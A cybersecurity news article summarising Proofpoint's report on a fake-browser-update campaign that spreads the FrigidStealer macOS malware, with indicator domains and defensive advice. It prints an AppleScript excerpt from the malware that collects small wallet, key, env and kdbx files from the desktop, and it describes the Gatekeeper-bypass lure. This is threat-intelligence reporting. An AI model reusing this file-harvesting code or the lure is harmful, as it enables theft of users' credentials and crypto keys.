New Web Inject Attack Campaigns Targeting MacOS Users To Deploy FrigidStealer Malware

Security researchers at Proofpoint have uncovered a sophisticated web inject campaign targeting MacOS users with a new information-stealing malware called FrigidStealer.

The operation involves two newly identified threat actors, TA2726 and TA2727, collaborating to compromise legitimate websites and redirect victims to fake browser update pages.

This marks a significant escalation in attacks against MacOS devices, which have traditionally faced fewer threats than Windows systems.

The attack chain begins when TA2726, a traffic distribution service (TDS) operator, injects malicious JavaScript into compromised websites.

This script redirects visitors based on geographic location and device type. North American users are funneled to TA569’s SocGholish malware, while European and Asian traffic is directed to TA2727’s payload delivery system.

For Mac users, researchers at Proofpoint noted that this results in a tailored attack: Safari or Chrome users see forged update prompts that download FrigidStealer via weaponized DMG files.

google
TA2727’s Safari-themed fake update lure delivering FrigidStealer (Source – ProofPoint)

Breakdown of FrigidStealer’s Execution

The malware employs advanced social engineering tactics, using WailsIO frameworks to render browser-like interfaces that mimic legitimate installers.

Victims receive instructions to right-click and “Open” the malicious application, bypassing macOS Gatekeeper protections. Upon execution, FrigidStealer leverages AppleScript to harvest critical data:-

set extensionsList to {"txt", "docx", "rtf", "doc", "wallet", "keys", "key", "env", "md", "kdbx"}
try
    set desktopFiles to every file of desktop
    repeat with aFile in desktopFiles
    try
        set fileExtension to name extension of aFile
        if fileExtension is in extensionsList then
            set fileSize to size of aFile
            if fileSize < 51200 then
                duplicate aFile to folder fileGrabberFolderPath with replacing
                delay 1
            end if
        end if
        end try
    end repeat
end try

Code snippet showing FrigidStealer’s logic for stealing cryptocurrency keys and documents.

The malware exfiltrates Safari/Chrome cookies, Apple Notes databases, and files with extensions associated with passwords (.wallet, .kdbx) to the C2 domain askforupdate[.]org.

TA2727 coordinates payload delivery through domains like deski[.]fastcloudcdn[.]com, which serve geographically filtered scripts to Windows, Android, and Mac users.

Security teams should prioritize detecting traffic to TA2726’s TDS infrastructure (blackshelter[.]org, rednosehorse[.]com) and monitor for suspicious AppleScript activity.

Proofpoint’s Emerging Threats ruleset now includes signatures to block these domains, while endpoint solutions must scrutinize ad-hoc signed binaries claiming to be browser updaters.

FrigidStealer’s password prompt mimicking system software (Source – ProofPoint)

As organizations harden email defenses, threat actors increasingly exploit compromised websites and abused CDNs to bypass traditional security perimeters.

Regular patching, user education about fake updates, and restricting unsigned application executions remain critical defenses against these evolving threats.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting – Register Here

googlenews
Vasantheeswaran R
Vasantheewaran, Security Analyst at Cyber Security News, monitoring threats and analyzing emerging cyber Threats. Passionate about malware analysis and threat intelligence.